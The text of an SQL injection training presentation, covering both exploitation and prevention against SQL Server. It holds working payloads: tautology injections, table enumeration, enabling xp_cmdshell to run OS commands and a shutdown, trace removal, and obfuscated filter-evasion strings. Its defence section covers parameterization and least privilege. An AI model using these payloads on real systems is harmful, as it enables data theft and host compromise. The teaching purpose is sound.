Devouring Security Sqli Exploitation and Prevention

DESCRIPTION

Devouring Security Sqli is an exploitation and prevention presentation that I did a while back. The presentation accompanies a screen recording which could be located at http://vimeo.com/gmaran23

Devouring Security

Sqli Exploitation & prevention

Part 1 & 2

Marudhamaran Gunasekaran

Watch the screen recording of this presentation at

Devouring Security – Sql Injection Part 1 - http://vimeo.com/83658524
Devouring Security – Sql Injection Part 2 – http://vimeo.com/85256464

Security: Feeling, Reality, Trade-offs, Wisdom

Ignorance is no excuse

Disclaimer

Techniques and Tools in this presentation should be used or applied on an application, only with prior consent of the application’s owner.

Illegal otherwise.

Sqli – Media coverage

http://pastebin.com/HUjZPaF3
http://thepiratebay.se/torrent/6443601
http://www.bloomberg.com/news/2013-01-24/sony-fined-394-000-over-2011-hacker-attack-on-playstation-data.html
http://www.eteknix.com/turkish-hackers-claim-to-have-leaked-40000-sony-italy-account-details/
http://news.techworld.com/security/3331283/barclays-97-percent-of-data-breaches-still-due-to-sql-injection/

Sqli – Why does it exist?

Yeah! I can develop/deploy without restrictions, I have full access.

Thanks bro! I am your uninvited database administrator now. I owe you, and your data.

I like them admin rights

Sqli – Why does it exist?

Conglomeration of Sensitive Data

Would you keep all your belongings in your home, or would you keep some in your safe deposit box?

Blindly Trusting Unsanitized User Input

"Over thousands of queries in a moderate- to large-size application, that 2% can result in a handful of SQL injections," Chou says. "All an attacker needs to do is find one of these, and you'll have millions of records stolen and a headline in Dark Reading."

Sqli – Why does it exist?

• It's not always about a developer knowing better; there are tons and tons of legacy code
• Remember, DBAs write SQL too
• No strict access control policies
• Windows-based/desktop-based applications are directly ported to the web
• Developers still don't know the complete truth about Sqli

Sqli 101

../Products?name=rat
SELECT 1 FROM Products WHERE ProductName = 'rat'

../Products?name=rat' or 1=1 --
SELECT 1 FROM Products WHERE ProductName = 'rat' or 1=1 -- '

The -- comments out the closing quote, so the WHERE clause reduces to "... or true" and every row matches.

Sqli 101

• http://sqli:8020/Sqli/

• http://localhost/WebGoat/attack?Screen=147&menu=1100&stage=1

Sqli U

http://sqli:8020/Sqli/ProductSearch

Sqli E

http://sqli:8020/SqliErrorRiddle/

Sqli E

-- table enumerator
SELECT TOP 1 Convert(INT, NAME)
FROM sys.tables
WHERE object_id = (
    SELECT TOP 1 object_id
    FROM (
        SELECT TOP 2 object_id
        FROM sys.tables
        ORDER BY object_id) AS TEMP
    ORDER BY object_id DESC)

Enumerating in MySQL is very easy with OFFSET.

ORMs and SPs Loopholes

http://sqli:8020/SqliORM/ProductSearch

It’s not an ORM’s problem to have you loaded with features

ALTER PROCEDURE SearchProducts (@Item VARCHAR(100))
AS
BEGIN
    DECLARE @query VARCHAR(400)
    SET @query = 'SELECT * FROM Products WHERE ProductName LIKE ''%' + @Item + '%'''
    PRINT @query
    EXEC (@query)
END
GO
-- Execute good
EXEC SearchProducts 'chai'
GO
-- Execute bad
EXEC SearchProducts 'chai%'' or 1=1--'
GO

Fixing SP Loopholes

ALTER PROCEDURE SearchProductsBetter (@Item VARCHAR(200))
AS
BEGIN
    DECLARE @safequery NVARCHAR(400)
    DECLARE @params NVARCHAR(200)
    SET @safequery = N'SELECT * FROM Products WHERE ProductName LIKE ''%'' + @param1 + ''%'''
    SET @params = N'@param1 NVARCHAR(200)';
    EXECUTE sp_executesql @safequery, @params, @param1 = @Item
END
GO
-- Execute bad (the input is now bound as a parameter value, not spliced into the SQL text)
EXEC SearchProductsBetter 'chai%'' or 1=1--'
GO

Profiling Host OS

• Privilege misuse and rooting

Profiling Host OS

-- enable command shell
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

-- disable command shell
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;

Profiling Host OS

-- play time!
exec xp_cmdshell 'tasklist'
exec master.dbo.xp_cmdshell 'whoami'
exec xp_cmdshell 'netsh advfirewall firewall show rule name=all profile=public'

Profiling Host OS

-- enumerate and remove trace
create table tempsz(temp varchar(MAX));
insert into tempsz exec xp_cmdshell 'tasklist';
select * from tempsz;
drop table tempsz;

-- enumerate and leave trace
create table tempsz(temp varchar(MAX));
insert into tempsz exec xp_cmdshell 'tasklist';

-- get enumerated information and remove trace
select temp from tempsz;
drop table tempsz;

Profiling Host OS

-- schedule a shutdown and send message to the user named maran

exec xp_cmdshell 'shutdown -s -t 6000'; exec xp_cmdshell 'msg maran You will be shut down in 100 minutes'

-- abort the shutdown and send message to the user named maran

exec xp_cmdshell 'shutdown -a'; exec xp_cmdshell 'msg maran I have heard your prayer. You are salvaged'

Profiling Host OS

OSCommand_Run in Oracle does the equivalent of xp_cmdshell in Sql server.

Sqli T

Just biding time, my friend

Sqli T

Oracle: DBMS_LOCK.sleep
T-SQL: WAITFOR DELAY
MySQL: BENCHMARK

Sqli B

Blind, but I could get by

Blind, not as fast, but I could travel miles

IDS Evasive Techniques

'485'='485'
'5'>'1'
"QSNR"="QSNR"
REPLACE('SEL/**/CT', '/**/', '')

Blacklist Filter Evasion

';exec xP_cMdsheLL 'dir';--

';ex/**/ec xp_cmds/**/hell 'dir';-- [old versions]

';exec/**/xp_cmdshell/**/'dir';--

';Declare @cmd as varchar(3000);Set @cmd = 'x'+'p'+'_'+'c'+'m'+'d'+'s'+'h'+'e'+'l'+'l'+'/**/'+''''+'d'+'i'+'r'+'''';exec(@cmd);--

Blacklist Filter Evasion

Declare @cmd as varchar(3000);
Set @cmd =(CHAR(101)+CHAR(120)+CHAR(101)+CHAR(99)+CHAR(32)+CHAR(109)+CHAR(97)+CHAR(115)+CHAR(116)+CHAR(101)+CHAR(114)+CHAR(46)+CHAR(46)+CHAR(120)+CHAR(112)+CHAR(95)+CHAR(99)+CHAR(109)+CHAR(100)+CHAR(115)+CHAR(104)+CHAR(101)+CHAR(108)+CHAR(108)+CHAR(32)+CHAR(39)+CHAR(100)+CHAR(105)+CHAR(114)+CHAR(39)+CHAR(59));
EXEC(@cmd);--

-- the CHAR() sequence decodes to: exec master..xp_cmdshell 'dir'

Sqli Exploitation tools

• Sqlmap
• sqlninja
• Safe3SI
• Enema
• Havij
• Pangolin
• BSQL Hacker
• ... and a lot more

Sqli Exploitation tools

Demonstration

1. Safe3SI
2. Enema
3. Sqlmap

Sqli Feeble Fixes

Blacklisting is suicide

IDSs are not very effective for Sqli

Feeble Fixes

Blacklisting

(can’t filter all possible dangerous inputs like below)

"QSNR"="QSNR"
REPLACE('SEL/**/CT', '/**/', '')

Blacklisting for Death

Sqli Prevention

• Exploitation tools
• Fuzzers
• Active/Passive vulnerability scanners

Core Defense

Input Validation with Whitelist, Type casting or/and RegEx.

Core Defense Validation with RegEx

Core Defense

CREATE PROCEDURE dbo.doQuery (@id NCHAR(4))
AS
DECLARE @query NCHAR(64)
IF RTRIM(@id) LIKE '[0-9][0-9][0-9][0-9]'
BEGIN
    SELECT @query = 'select ccnum from cust where id = ''' + @id + ''''
    EXEC (@query)
END
RETURN

-- Or, better yet, force an integer parameter
CREATE PROCEDURE dbo.doQuery(@id smallint)

Core Defense

Parameterization, a.k.a. prepared statements

[refer to your framework for support]
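As an added illustration that is not part of the presentation, here are the deck's SearchProducts loophole and its parameterized fix side by side, in Python against SQLite (assumed here in place of SQL Server; the product rows are constructed). Beyond the deck's sp_executesql fix, it also escapes LIKE wildcards, so a user-typed % cannot widen the match even once the input is bound as data.

```python
import re
import sqlite3

# Constructed sample rows standing in for the deck's Products table
# (not data from the presentation).
PRODUCTS = [("Chai",), ("Chai Latte",), ("Chang",), ("Aniseed Syrup",), ("rat",)]


def make_db():
    """Build an in-memory SQLite database holding the sample products."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Products (ProductName TEXT)")
    conn.executemany("INSERT INTO Products VALUES (?)", PRODUCTS)
    return conn


def search_vulnerable(conn, item):
    """String concatenation, the same pattern as the deck's SearchProducts.
    The input becomes SQL text: a quote closes the literal and the trailing
    -- comments out the rest of the statement."""
    query = "SELECT ProductName FROM Products WHERE ProductName LIKE '%" + item + "%'"
    return [row[0] for row in conn.execute(query)]


def escape_like(item):
    """Escape the LIKE metacharacters (backslash, % and _) so wildcards typed
    by the user are matched literally instead of widening the search."""
    return re.sub(r"([\\%_])", r"\\\1", item)


def search_parameterized(conn, item):
    """Bound parameter: the input is sent as data and never parsed as SQL.
    The wildcards live in the query text; the value is escaped and the
    ESCAPE clause tells SQLite which character marks a literal % or _."""
    query = ("SELECT ProductName FROM Products "
             "WHERE ProductName LIKE '%' || ? || '%' ESCAPE '\\'")
    return [row[0] for row in conn.execute(query, (escape_like(item),))]


if __name__ == "__main__":
    db = make_db()
    payload = "chai%' or 1=1--"   # the deck's "Execute bad" input
    print("vulnerable:", search_vulnerable(db, payload))        # every row leaks
    print("parameterized:", search_parameterized(db, payload))  # []
```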

Core Defense

Encrypt data to prevent disclosure when physical database files are stolen.

1. Encryption does not do a darn thing to protect you from direct Sqli
2. Encryption only protects you from Sqli-induced attacks

Core Defense

Database user account audits

1. Selective privilege principle
2. Least privilege principle

Code Reviews - Spot and Stop Sqli

CAT.Net Sqli Scan

MicrosoftACECodeAnalysisReport.htm

Netsparker community edition

What now?

Sqli Cheatsheet - http://ferruh.mavituna.com/sql-injection-cheatsheet-oku
Dynamic queries in T-SQL - http://www.sommarskog.se/dyn-search-2005.html
http://www.sommarskog.se/dyn-search-2008.html

End of the world

Watch the screen recording of this presentation at my vimeo channel

Devouring Security – Sql Injection Part 1 - http://vimeo.com/83658524

Devouring Security – Sql Injection Part 2 – http://vimeo.com/85256464